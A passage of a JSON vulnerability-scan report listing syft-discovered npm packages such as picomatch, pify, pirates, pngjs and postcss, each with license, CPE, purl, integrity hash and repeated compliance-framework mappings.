"javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.2.tgz", "integrity": "sha512-V7+vQEJ06Z+c5tSye8S+nHUfI51xoXIXjHQ99cQtKUkQqqO1kO/KCJUfZXuB47h/YBlDhah2H3hdUGXn8ie0oA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "44e51885407159f3", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: picomatch 4.0.4", "title": "picomatch 4.0.4", "description": "Package discovered: picomatch 4.0.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "09943c54769c1f79", "name": "picomatch", "version": "4.0.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:jonschlinkert:picomatch:4.0.4:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/picomatch@4.0.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.4.tgz", "integrity": "sha512-QP88BAKvMam/3NxH6vj2o21R6MjxZUAd6nlwAS/pnGvN9IVLocLHxGYIzFhg6fUQ+5th6P4dv4eW9jX3DSIj7A==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "b7793733f0a92625", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: pify 2.3.0", "title": "pify 2.3.0", "description": "Package discovered: pify 2.3.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "93c54feee38dbf96", "name": "pify", "version": "2.3.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:pify:pify:2.3.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/pify@2.3.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/pify/-/pify-2.3.0.tgz", "integrity": "sha512-udgsAY+fTnvv7kI7aaxbqwWNb0AHiB0qBO89PZKPkoTmGOgdbrHDKD+0B2X4uTfJ/FT1R09r9gTsjUjNJotuog==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "0b578240afa70fcd", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: pirates 4.0.7", "title": "pirates 4.0.7", "description": "Package discovered: pirates 4.0.7", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "47481e92080dd044", "name": "pirates", "version": "4.0.7", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:pirates:pirates:4.0.7:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/pirates@4.0.7", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.7.tgz", "integrity": "sha512-TfySrs/5nm8fQJDcBDuUng3VOUKsd7S+zqvbOTiGXHfxX4wK31ard+hoNuvkicM/2YFzlpDgABOevKSsB4G/FA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "72750f8253cdf631", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: png-js 2.0.0", "title": "png-js 2.0.0", "description": "Package discovered: png-js 2.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "7a0a81fa01919ffb", "name": "png-js", "version": "2.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:png-js:png-js:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:png-js:png_js:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:png_js:png-js:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:png_js:png_js:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:png:png-js:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:png:png_js:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/png-js@2.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/png-js/-/png-js-2.0.0.tgz", "integrity": "sha512-GdzJuUMc6ZSpxFJWVxtOH1bzYHym+TOnveqUjb+VJIbZWbZzyiRGFiKhbiielfpYbgMlhHVhsJ0FTazfuRFkMA==", "dependencies": { "fflate": "^0.8.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "017b0d73e37dad2f", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: pngjs 5.0.0", "title": "pngjs 5.0.0", "description": "Package discovered: pngjs 5.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "33a77729322028df", "name": "pngjs", "version": "5.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:pngjs:pngjs:5.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/pngjs@5.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/pngjs/-/pngjs-5.0.0.tgz", "integrity": "sha512-40QW5YalBNfQo5yRYmiw7Yz6TKKVr3h6970B2YE+3fQpsWcrbj1PzJgxeJ19DRQjhMbKPIuMY8rFaXc8moolVw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "6c2c21065eca2894", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: postcss 8.4.31", "title": "postcss 8.4.31", "description": "Package discovered: postcss 8.4.31", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "a519bffcd9b56c6d", "name": "postcss", "version": "8.4.31", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:postcss:postcss:8.4.31:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/postcss@8.4.31", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/postcss/-/postcss-8.4.31.tgz", "integrity": "sha512-PS08Iboia9mts/2ygV3eLpY5ghnUcfLV/EXTOW1E2qYxJKGGBUtNjN76FYHnMs36RmARn41bC0AZmn+rR0OVpQ==", "dependencies": { "nanoid": "^3.3.6", "picocolors": "^1.0.0", "source-map-js": "^1.0.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "87700f6dfcbe47e2", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: postcss 8.5.12", "title": "postcss 8.5.12", "description": "Package discovered: postcss 8.5.12", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "588683a1923c27d7", "name": "postcss", "version": "8.5.12", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:postcss:postcss:8.5.12:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/postcss@8.5.12", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/postcss/-/postcss-8.5.12.tgz", "integrity": "sha512-W62t/Se6rA0Az3DfCL0AqJwXuKwBeYg6nOaIgzP+xZ7N5BFCI7DYi1qs6ygUYT6rvfi6t9k65UMLJC+PHZpDAA==", "dependencies": { "nanoid": "^3.3.11", "picocolors": "^1.1.1", "source-map-js": "^1.2.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f6953879c586ae44", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: postcss-import 15.1.0", "title": "postcss-import 15.1.0", "description": "Package discovered: postcss-import 15.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "9f2c64d652651310", "name": "postcss-import", "version": "15.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:postcss-import:postcss-import:15.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss-import:postcss_import:15.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss_import:postcss-import:15.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss_import:postcss_import:15.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss:postcss-import:15.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss:postcss_import:15.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/postcss-import@15.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/postcss-import/-/postcss-import-15.1.0.tgz", "integrity": "sha512-hpr+J05B2FVYUAXHeK1YyI267J/dDDhMU6B6civm8hSY1jYJnBXxzKDKDswzJmtLHryrjhnDjqqp/49t8FALew==", "dependencies": { "postcss-value-parser": "^4.0.0", "read-cache": "^1.0.0", "resolve": "^1.1.7" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "49a05cdffa8a7ef9", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: postcss-js 4.1.0", "title": "postcss-js 4.1.0", "description": "Package discovered: postcss-js 4.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "9feba814d6f9cb30", "name": "postcss-js", "version": "4.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:postcss-js:postcss-js:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss-js:postcss_js:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss_js:postcss-js:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss_js:postcss_js:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss:postcss-js:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:postcss:postcss_js:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/postcss-js@4.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/postcss-js/-/postcss-js-4.1.0.tgz", "integrity": "sha512-oIAOTqgIo7q2EOwbhb8UalYePMvYoIeRY2YKntdpFQXNosSu3vLrniGgmH9OKs/qAkfoj5oB3le/7mINW1LCfw==", "dependencies": { "camelcase-css": "^2.0.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "92ac10dec31ee632", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: postcss-load-config 6.0.1", "title": "postcss-load-config 6.0.1", "description": "Package discovered: postcss-load-config 6.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "07fb83a013bf4ef4", "name": "postcss-load-config", "version": "6.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": 